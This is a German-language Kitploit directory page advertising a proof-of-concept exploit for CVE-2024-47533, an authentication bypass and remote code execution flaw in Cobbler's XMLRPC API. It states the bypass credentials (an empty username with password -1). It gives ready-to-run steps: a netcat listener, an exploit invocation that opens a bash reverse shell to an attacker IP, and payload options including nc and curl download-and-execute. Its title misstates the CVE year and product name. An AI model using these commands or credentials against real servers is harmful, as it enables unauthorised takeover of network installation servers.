Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-47533 — PoC of CVE-2025-47533 Clobber RCE | Kitploit
Tools/GitHubGitHub/zs1n/cve-2024-47533
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubzs1n/cve-2024-47533

CVE-2024-47533

PoC of CVE-2025-47533 Clobber RCE

Repository anzeigen
1vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-47533 - Cobbler XMLRPC Authentifizierungsumgehung RCE Exploit

Kritische Remote-Codeausführung durch Authentifizierungsumgehung in Cobbler

PoC-Implementierung.


Zusammenfassung

Cobbler, ein Linux-Installationsserver, der die schnelle Einrichtung von Netzwerkinstallationsumgebungen ermöglicht, weist in den Versionen 3.0.0 bis (aber nicht einschließlich) 3.2.3 und 3.3.7 eine Authentifizierungsschwachstelle auf. Die Funktion utils.get_shared_secret() gibt stets -1 zurück, sodass jeder mit einem leeren Benutzernamen ('') und Passwort -1 eine Verbindung zur Cobbler XMLRPC-Schnittstelle herstellen kann. Dies ermöglicht einem Angreifer mit Netzwerkzugriff die vollständige Kontrolle über den Cobbler-Server. Die Schwachstelle wurde in den Versionen 3.2.3 und 3.3.7 behoben.


🛠 Technische Aufschlüsselung

Die Schwachstelle wird durch unsachgemäße Behandlung des gemeinsamen Geheimnisses in der Funktion utils.get_shared_secret() verursacht, die immer -1 zurückgibt und so die Authentifizierung effektiv umgeht. Dadurch kann jeder Netzwerkbenutzer mit leeren Anmeldedaten eine Verbindung zur Cobbler XMLRPC-Schnittstelle herstellen und beliebige Befehle ausführen.


🔥 Angreifbarer Endpunkt

http://<target>:25151/ — Cobbler XMLRPC API-Endpunkt


💥 Beispiel-Payloads

  • Bash-Reverse-Shell
  • Netcat-Shells (nc)
  • Curl herunterladen & ausführen

Proof-of-Concept (PoC)

Vorbereiten des Listeners

Starten Sie einen Netcat-Listener auf Ihrem Rechner:

root@kitploit:~
nc -lvnp 4444

🚀 Ausführen des Exploits

Führen Sie das Exploit-Skript CVE-2024-47533.py aus.

root@kitploit:~
python3 CVE-2024-47533.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

Parameter

  • -t : Ziel (Beispiel: -t http://1<IP_SERVICE>:<PORT>)
  • -l: Lokale IP (Beispiel: -l 10.10.11.80)
  • -p : Port <LOCAL_PORT> (Beispiel: -p 4444)
  • --payload: Payload (bash, curl, nc) (Beispiel: --payload bash)

💻 Erfolgreicher Remote-Shell-Zugriff

Bei erfolgreicher Ausführung stellt sich die Reverse-Shell wieder mit dem Listener verbinden und gewährt dem Angreifer Remote-Zugriff auf den Server.

Tool herunterladen